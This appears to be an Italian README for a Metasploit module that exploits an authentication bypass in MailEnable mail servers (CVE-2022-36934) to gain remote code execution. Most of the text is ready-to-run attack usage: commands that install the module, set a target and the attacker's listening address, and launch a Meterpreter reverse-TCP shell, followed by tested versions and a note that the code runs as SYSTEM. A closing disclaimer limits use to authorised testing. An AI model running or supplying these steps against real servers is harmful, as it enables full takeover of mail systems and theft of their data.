
Modulo Metasploit per MailEnable CVE-2022-36934 bypass dell'autenticazione RCE
Modulo Metasploit per la vulnerabilità di bypass dell'autenticazione in MailEnable (CVE-2022-36934), che porta all'esecuzione remota di codice.
cp modules/exploits/windows/smtp/mailenable_authbypass_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/smtp/
reload_all
use exploit/windows/smtp/mailenable_authbypass_rce set RHOSTS <target_ip> set LHOST <your_ip> set PAYLOAD windows/x64/meterpreter/reverse_tcp exploit
🎯 Testato su:
MailEnable Professional 10.25 Windows Server 2019 MailEnable Enterprise 10.30 Windows Server 2016
📝 Dettagli tecnici:
Vulnerabilità: bypass dell'autenticazione tramite sintassi simile a SQLi in SMTP/POP3
Vettore d'attacco: rete (porte 25/110)
Privilegi: viene eseguito con l'account del servizio MailEnable (spesso SYSTEM)
⚠️ Disclaimer legale:
Questo strumento è solo per test autorizzati. Non usarlo mai contro sistemi che non possiedi o per cui non hai esplicito permesso di testare.